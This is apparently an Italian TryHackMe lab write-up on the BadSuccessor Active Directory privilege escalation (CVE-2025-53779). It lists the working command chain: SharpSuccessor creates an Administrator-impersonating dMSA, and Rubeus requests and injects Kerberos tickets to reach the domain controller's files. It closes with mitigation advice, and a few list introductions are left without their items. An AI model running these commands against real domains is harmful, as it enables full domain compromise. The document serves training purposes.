
Una stanza di TryHackme che copre lo sfruttamento di CVE-2025-53779 utilizzando windows
In questa stanza, esploriamo la tecnica di escalation dei privilegi BadSuccessor, una vulnerabilità che abusa degli Account di Servizio Gestiti Delegati (dMSA) in Active Directory. L'attacco consente a un utente con sufficiente controllo su un oggetto dMSA di impersonare un altro account e potenzialmente raggiungere i privilegi di Amministratore di Dominio.
Stanza: https://tryhackme.com/room/adbadsuccessor
Difficoltà: Media
Data: 05/06/2026
Versione: 1.0
Obiettivo: Dimostrare come gli Account di Servizio Gestiti Delegati possano essere abusati per aumentare i privilegi e compromettere un ambiente Active Directory.
Ruolo: Terry Byte (tbyte)
Scopo: Valutare la sicurezza di un ambiente Active Directory appena implementato e determinare se è vulnerabile all'attacco BadSuccessor.
L'attacco consiste in due fasi principali:
xfreerdp /v:10.211.101.20 /u:tbyte /p:P\@SSw0rd345 /dynamic-resolution
Spostarsi nella directory Proof-of-Concept:
cd C:\PoC
Verificare il contenuto: dir
https://github.com/akamai/BadSuccessor/blob/main/Get-BadSuccessorOUPermissions.ps1
notepad Get-BadSuccessorOUPermissions.ps1
.\Get-BadSuccessorOUPermissions.ps1
Usare SharpSuccessor per creare un Account di Servizio Gestito Delegato che impersona l'account Administrator:
.\SharpSuccessor.exe add /path:"ou=LabOU,dc=tryhackme,dc=local" /account:tbyte /name:pentest_dmsa /impersonate:Administrator
Cosa Succede?
Usare Rubeus per ottenere un Ticket Granting Ticket (TGT) delegato:
.\Rubeus.exe tgtdeleg /nowrap
Il comando restituisce un ticket Kerberos codificato in Base64.
Copiare il ticket generato.
.\Rubeus.exe asktgs /targetuser:pentest_dmsa$ /service:krbtgt/tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
Risultato:
Un nuovo ticket Kerberos viene iniettato nella memoria per l'account dMSA.
Sfruttare il ticket dMSA per ottenere l'accesso ai servizi in esecuzione nel contesto di Administrator:
.\Rubeus.exe asktgs /user:pentest_dmsa$ /service:cifs/DC-LAB2025-01.tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
Risultato:
dir \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\
Leggere la flag memorizzata sul desktop di Administrator:
Get-Content \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\flag.txt
Flag ottenuta con successo.
BadSuccessor dimostra come gli Account di Servizio Gestiti Delegati possano introdurre percorsi di escalation dei privilegi negli ambienti Active Directory. Active Directory funge da spina dorsale dell'identità per molte organizzazioni; le vulnerabilità che colpiscono Kerberos e la delega degli account possono avere gravi conseguenze.
Un utente malintenzionato con permessi sufficienti su un oggetto dMSA può:
Per mitigare BadSuccessor (CVE-2025-53779), le organizzazioni dovrebbero applicare tempestivamente gli aggiornamenti di sicurezza di Microsoft, limitare e revisionare le autorizzazioni dMSA, monitorare l'attività Kerberos sospetta, controllare le relazioni di delega e applicare il principio del minimo privilegio. Revisioni regolari delle impostazioni di delega di Active Directory possono aiutare a identificare e ridurre i potenziali percorsi di escalation dei privilegi.
Questa stanza ha fornito una preziosa esperienza pratica con: